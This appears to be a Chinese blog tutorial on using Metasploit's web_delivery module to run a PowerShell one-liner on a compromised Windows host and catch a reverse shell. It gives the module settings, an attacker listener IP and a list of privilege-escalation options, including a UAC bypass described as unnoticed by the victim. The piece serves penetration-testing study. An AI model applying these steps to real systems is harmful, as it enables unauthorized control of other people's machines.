一条命令上线MSF(Metasploit)-web_delivery模块

已于 2022-10-31 22:34:04 修改
阅读量2.5k 收藏 9
点赞数 1
分类专栏: 渗透测试工具 内网渗透 文章标签: web安全 渗透测试 安全 安全漏洞 网络安全
于 2022-10-31 22:33:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847838/article/details/127623761
版权

文章目录

前言

最近比较多人问我,如果在实战里getshell了,比如各种OA的rce,但是会碰到权限很低,不是root或者是system权限的情况,而且在拿到shell之后不知道怎么提权,不知道下一步该干嘛,后渗透不是很熟练等等等等。所以我就趁今晚月色那么漂亮,顺便记一下web_delivery模块。
如果被控主机是windows系统的话,那么上线msf就可以用这个模块,powershell一条命令直接上线msf,很舒服。

提示:以下是本篇文章正文内容,下面案例可供参考

一、场景模拟

因为最近抓的严,所以我就不拿实战的例子来搞了,还是用虚拟机自己搞搞比较合适。
目标主机是一台windows系统的。并且现在我们可以命令执行,但是系统权限很低。
在这里插入图片描述

二、一条命令上线msf

kali作为攻击机,直接启动msf。
使用web_delivery模块。
我一般用msf都是怎么方便怎么来,想用什么模块或者是哪个漏洞的exploit我都是直接search 后面跟关键字。比如我这里直接search web_deli回车,就出来完整的模块了。
要用哪个,直接use前面的编号就行。

假如 如果想打永恒之蓝ms17010,那么直接search ms_17回车,找到那个对应的模块直接use编号就可以了。

在这里插入图片描述

然后就要设置目标-target,target不同,paylaod也会不同,直接show targets一下,就可以看到有哪些。
在这里插入图片描述
有python的payload,也有php的等等,第2个PSH的意思就是powershell的缩写。因为目标是windows系统,所以用这个PSH的方法就可以直接一条命令快速上线msf。set target 2即可。
接着就是设置payload的类型。
在这里插入图片描述
注意了,这里的payload不可以乱来的,而是要看目标主机的系统具体是什么,是x64还是x86。而看这个配置的命令是systeminfo,所以在被控主机的shell里直接输入systeminfo命令就能看到了。
在这里插入图片描述
这里显示了这是一台x64的windows。
所以payload也要选择对应的x64。
在这里插入图片描述

这里选择的是第204个payload。reverse就是反向连接的意思,bind就是正向连接,因为当前被控主机可以出网(能和攻击机直接通信),所以直接set payload 204。但是payloads那么多,会不会挑选的时候头晕眼花的感觉?其实可以直接set payload 然后wind按Tab键补齐,一路补齐过去就行了。这里节省时间不展示。
在这里插入图片描述
然后show options查看一下有哪些配置需要去设置的。这里缺一个LHOST监听地址,直接set lhost 192.168.25.130(攻击机的ip)就行。然后run或者exploit都行。
在这里插入图片描述
然后直接把这一大串的命令直接复制粘贴到被控主机上回车执行。
在这里插入图片描述

msf成功接收到了session,目标主机shell已经上线到msf.
在这里插入图片描述

因为是低权限,所以需要提权。
在这里插入图片描述
因为时间关系,所以就不演示了,具体msf的提权方法有很多。
1.直接用msf的getsystem命令提权。(这里不行)
2.用msf的一些模块,ask模块(需要交互,设置文件名,要受害者点击)
3.uac绕过模块-【bypassuac】(无需交互,受害者不知道。)
4.用提权漏洞提权:ms14_058,ms16_016。

更多cs和msf的上线方法和两者之间的联动,我之前有发过相关博客,可以去看看,挺详细。
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell

总结

没有总结,晚上办公室太多蚊子,回家撸猫。

    文章原创,欢迎转载,请注明文章出处: 一条命令上线MSF(Metasploit)-web_delivery模块.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

归去来兮-zangcc
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2452
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shell给msf
内网安全--隧道技术-MSF上线本地
金灰的博客
05-28 922
免责声明:本文仅做技术交流与学习...
MSF恶意程序利用+CS上线
dream2662583的博客
10-19 319
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
Empire安装,基本介绍,命令使用,监听(一)
single_g_l的博客
03-12 4558
目录 一.​Empire介绍 二. 安装Empire 1.命令安装 2.Git安装 3.Docker安装 三. 基本使用 1. Empire拥有客户端和服务端 2. 客户端操作 1) 基础命令 2)监听器 四. Empire 基础详解(模块,命令) 1.empire 相关命令 2. interact 命令 3. uselistener 监听模块 4. usestager模块(payload) 5. usemodule privesc 提权模块 6.PowerBr...
Metasploit渗透测试框架
2301_80361487的博客
05-26 1196
web_delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set target 0或1或2来设置是使用php还是python还是powershell等。meterpreter是一个高级、动态、可扩展的payload,简单理解是一个高级的CMD,里面封装了Metasploit的。:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的漏洞,并持续保持更新。
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 7887
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
ATT&CK(七)
qq_52579508的博客
06-20 1038
目标地址: 10.10.10.10进行端口扫描端口还带有6376端口 ,redis数据库,先去看看web端存在 81 web 端口 ,进行访问是一个 Laravel v8.29.0 (PHP v7.4.14)对这个Laravel v8.29.0 进行搜索是否存在历史漏洞是存在RCE漏洞的Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。
红队专题-Meterpreter
aming小老弟
09-06 529
Metasploit是一款开源的安全漏洞检测 渗透测试 工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
ATT&CK实战系列——红队实战(一)
shawdow_bug的博客
08-20 585
第一个红日靶场的渗透测试笔记
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 155
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
"rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_"这个标题暗示了我们正在讨论一个与RTK相关的ROS(Robot Operating System)驱动程序,它可能涉及到了一些关键组件和技术。 首先,"RTK"是Real-Time Kinematic的...
metasploit-framework-master.zip
09-08
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测和利用工具,广泛应用于网络安全评估和渗透测试。它由 Rapid7 维护,是全球黑客社区的重要资源,同时也是信息安全专业人员的必备武器。"metasploit-...
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
09-10
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
Mastering-Metasploit:掌握Metasploit书中的Metasploit模块
05-17
此存储库包含《掌握Metasploit手册》中涵盖的模块: #要将所有模块自动加载到metasploit: ./msfrun.sh #手动方法#加载所有核心metasploit模块(开发,辅助,发布): msf>加载路径/ root / Desktop / ...
msf-with-rubymine:如何使用Ruby开发metasploit模块
04-10
msf-with-rubymine 如何在RubyMine中使用metasploit1.设置您的开发环境在第一步中安装软件包: : 2.在〜/ .msf4中添加一个Gemfile: # ~/.msf4/Gemfilesource 'https://rubygems.org'gem 'metasploit-framework', ...
微软蓝屏”事件暴露了网络安全哪些问题?
2301_79339087的博客
07-23 1441
微软蓝屏事件不仅暴露了软件更新中的问题,更是一次对全球网络安全和系统稳定性的严峻考验。通过加强风险管理、质量控制、冗余设计和应急响应,我们可以在未来减少类似事件的发生,提高整体网络安全水平。各行业应加强合作,信息共享,共同提升应对重大系统故障的能力,构建更加稳固和安全的网络环境。在未来,我们需要更加关注软件更新过程中的风险管理和质量控制,通过引入更多的自动化工具和流程,提高测试的覆盖率和效率,确保软件的安全性和稳定性。
网络安全-华为华三交换机防火墙日志解析示例
最新发布
PanDD_0_1的博客
07-23 322
华为交换机日志解析示例。
网站验证:确保网络安全与信任的重要步骤
07-22 300
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
#!/usr/bin/env bash python3 train.py \ --data_dir <Your data dir> \ --images_folder imgs/ \ --train_annotations_file aus_dataset.pkl \ --test_annotations_file aus_dataset_test.pkl \ --generator_name unet_msf_generator \ --normtype_G instancenorm \ --discriminator_name discriminator_wgan_plus \ --normtype_D None \ --name experiment_1 \ --nepochs_no_decay 30 \ --nepochs_decay 20 \ --gpu_ids 0,1 \ --lr_D 1e-4 \ --lr_G 1e-4 \ --lr_decays_to 1e-5 \ --image_size 128 \ --batch_size 16 \ --ngf 64 \ --ndf 64 \ --cond_nc 13 \ --train_G_every_n_iterations 4 \ --lambda_D_prob 1 \ --lambda_D_cond 150 \ --lambda_D_gp 10 \ --lambda_G_fake_cond 150 \ --lambda_rec_l1 30 \ --lambda_cyc_l1 30 \ --lambda_smooth 1e-5
07-13
根据你提供的内容,这是一个 Bash 脚本,其中调用了 `python3` 命令来运行 `train.py` 脚本,并传递了一系列参数。 在运行这个脚本之前,你需要确保以下几点: 1. Python 环境:你需要安装 Python 3,并且在命令行中可以使用 `python3` 命令来执行 Python 代码。你可以使用 `python3 --version` 命令检查 Python 版本。 2. 依赖项:脚本可能依赖一些 Python 包或库,请确保你已经安装了这些依赖项。你可以使用 `pip install package_name` 命令来安装所需的包。 3. 数据目录和文件:在运行脚本时,你需要提供正确的数据目录和文件路径。请将 `<Your data dir>` 替换为你实际的数据目录路径,并确保 `imgs/`、`aus_dataset.pkl` 和 `aus_dataset_test.pkl` 这些文件存在于指定的路径中。 4. GPU 支持:脚本中使用了 `--gpu_ids 0,1` 参数来指定在哪些 GPU 上运行训练。请确保你有可用的 GPU,并且已经安装了相应的 GPU 驱动和 CUDA 工具包。 在确认满足上述要求后,你可以在终端中运行该脚本,例如: ```bash bash train.sh ``` 这将执行 `train.sh` 脚本,并传递相应的参数给 `train.py` 脚本进行训练。请注意,你可能还需要根据自己的需求对脚本中的参数进行调整。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

归去来兮-zangcc

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值